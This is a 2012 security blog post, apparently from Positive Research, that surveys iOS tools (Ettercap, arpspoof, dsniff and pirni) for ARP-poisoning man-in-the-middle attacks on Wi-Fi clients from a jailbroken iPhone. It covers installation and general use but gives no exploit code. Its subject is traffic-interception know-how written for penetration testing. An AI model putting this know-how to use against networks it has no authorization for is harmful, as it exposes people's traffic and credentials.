Monday, July 2, 2012

iPhone: MiTM attack out of a pocket

A laptop seems to be a typical device for Wi-Fi attacks. There are multiple reasons for it: applicability of specific Wi-Fi modules, availability of necessary software and sufficient computing power. So usually we imagine an attacker holding a laptop while sitting in a car with an antenna sticking out of the window. However, development of mobile platforms is moving forward, and a lot of operations can be performed out of a pocket now.

Many of us use Apple devices based on iOS. It is not a secret that iOS is actually a representative of the *nix family, and thus has all its advantages including availability of various classical pentest applications. This time I want to consider tools for conducting simple Man in the Middle attacks against Wi-Fi clients using the arp poisoning technique.

Unfortunately, this can be done only on jailbroken devices. For the purpose of this article, jailbreaking is used to access third party libraries and resources distributed only via alternative repositories.

Cydia will be used to install applications. I won't consider any specific iOS, but these solutions successfully work on versions 4.* and 5.*. First of all, we have to set up a library for packet capture — libpcap. It is located in the default repository, and there shouldn't be any problems with its installation. This library will allow us to use several popular products for traffic interception.

It's worth reminding that access to the device's console is a must have for you to use the majority of programs. It can be obtained with the help of OpenSSH from Cydia and a third party client, for example, iSSH from AppStore, or with the local application Terminal, installed from the same Cydia. Please pay attention to the fact that the applications will require preliminary installation of libraries for work with Berkeley DB from the default repository.

Secondly, you have to install TheWorm repository, which contains necessary utilities. Any additional information about the installation of new repositories is available here.

I think that the most interesting iOS-based tool for traffic interception is the Ettercap utility, which is rather convenient and allows you to carry out all operations directly from it. It is so popular that you can easily find millions of its examples. For display purposes, there is even a demonstration video. Together with the local Terminal, you'll have to use only the text-based interface. And if you use iSSH on an iOS device, the full application of console graphics, started with the help of the ettercap -C command, is possible. Variety of available functions allows you to conduct a proper attack and analyze traffic without leaving the spot. The only disadvantage is the difficulty of working in the console using a mobile device, but it is more than compensated by the variety of opportunities.

However, you may want to control the process of spoofing and interception. Then a set of utilities included into the dsniff packet will suit you. It includes arpspoof and dsniff that are necessary to conduct ARP Poisoning attacks. If you don't know these tools, then first of all it's better to read use manuals.

I think that this set is good for the pcap information collection on your mobile phone with its subsequent analysis on a PC with the help of such utilities as NetworkMiner or Wireshark. For information transferring, you can use WinSCP, Fugu or any tool convenient for you. All in all, this set of applications is sufficient and even excessive for network testing on resistance to ARP Poisoning.

The third and the last tool I would like to dwell upon is pirni. It is a traffic interceptor developed specially for iOS and performing classical functions of interception and packets analysis: attack on the ARP table of one or several hosts, collection of traffic and its analysis via filters. It is represented in two versions: OpenSource and Pirni Pro, a charged graphic utility, which is quite easy to use. It saves final results in the pcap format, suitable for subsequent analysis. Graphical version reduces the whole attack to one click. This version has an embedded traffic filter, that uses RegEx allowing to watch results in a real time mode, and a minimum set of scanning configurations. In case correctly written regular expressions are used, the testing results will instantly appear on the screen of your device.

Finally, I want to note that there are many iOS software utilities available allowing to conduct the simplest Wi-Fi attacks. Such use may be deemed improper but it has its right to exist.
Thank you for attention! Hope you've learnt something new.

Author: Kirill Ermakov, Positive Research